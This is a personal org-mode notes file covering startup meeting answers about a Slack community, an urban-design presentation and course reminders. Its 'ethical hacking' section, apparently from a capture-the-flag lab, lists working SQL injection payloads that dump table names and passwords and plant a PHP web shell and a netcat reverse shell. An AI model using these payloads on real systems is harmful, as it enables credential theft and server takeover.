#+AUTHOR: CALIN CAPITANU
#+TITLE: Quick Notes

* Hailey meeting 12/08/2020
** What do you think Hailey can achieve, do and use the Slack channel for - how does it differ from the custom made app?
Only through slack I think we can do at most the following:
+ Gather a medium sized community
+ Get 5-10% of that community to actively interact with eachother and be interested in our posts there
+ Organize LegalTech events
It is mostly different in terms of control over how users interact with the platform. I think that the initial target of this is to gather a 
community, thus for the short-term, there is nothing more that a dedicated app would offer, but needs might arise for specific implementations.
** What do you envision your role in relation to the Hailey Slack channel to be? What do you want to do in the Slack channel?
I would like to see myself as a moderator for the tech channel along with Leandro.
** How does your role change in the light of the pivot?
   It all depends on what are the next decisions, haha. If the decision is that we are building smaller tools to help the legal-tech community, then 
   I'd guess my role would still be as a developer, which would be great. Otherwise, I think my role would be more of a Newspaper Reporter to the
tech channel, maybe Moderator as above mentioned.
** What are the new roles and necessities you see emerging from the pivot?
Definetely crowd controllers and community builders. People that know how people work, if that makes sense. People that know how to 
keep people talking and engaged in conversation. We are trying basically to become a group of influencers, which we need reputation for,
thus people with such knowledge would be great (vloggers, bloggers).
** What new commitments or changes to your excisiting ones are you ready to make due to the pivot?
I would like to be involved as much as I was before, I think it is the right amount of work I can do at the moment, school starts in 2 weeks, or one 
which is scary, but I might be able to do more at times, possible less at other times (exams of course). But around 8 to 10 hours a week is usually something
I can do for 
* ethical hacking
** databases
%' UNION (SELECT 1,table_name,3,4  FROM information_schema.tables ) UNION SELECT 1,2,3,4 FROM users WHERE 1 LIKE '%
** columns
%' UNION (SELECT 1,column_name,3,4  FROM information_schema.columns WHERE TABLE_NAME = 'users') UNION SELECT 1,2,3,4 FROM users WHERE 1 LIKE '%
** flag
%' UNION (SELECT 1,flag,3,4  FROM flags) UNION SELECT 1,2,3,4 FROM users WHERE 1 LIKE '%
** passwords
%' UNION (SELECT usID, usPseudo, usPasse , usAvecPhoto  FROM users) UNION SELECT 1,2,3,4 FROM users WHERE 1 LIKE '%



%' union select 1, '<?php system($_GET["cmd"]); ?>',2,3 into outfile '/var/www/html/php/cmd.php' #

%' union select 1, '<?php system('/bin/sh | nc 10.0.2.15 5566'); ?>',2,3 into outfile '/var/www/html/php/cmd1.php' #
* Prezentare Vlad
In order to better represent our vision, we chose Sergels Torg as a reference point for the project. 
We found that Sergels Torg is a quite dynamic place, and in our vision, the life in 2060 will be less stressful,
moreover, even more calm. So in order to achieve that, we redesigned Sergels Torg as
a big amphitheater and we also redesigned the pavement. In terms of agriculture and urban farming,
we changed the high buildings into farming factories, and in order to take advantage of the place itself,
we designed an extra facade that brings more space for urban farming to take place in the very center of the 
city. As mentioned before, the main commercial buildings will be changed by 2060 into stores with local 
production. 
* Probability and Statistics
Review problems 6.1-6.6
Exercise session 6
* Amir English
1: detailed notes of some things
13: To appeal to people
15: Claim





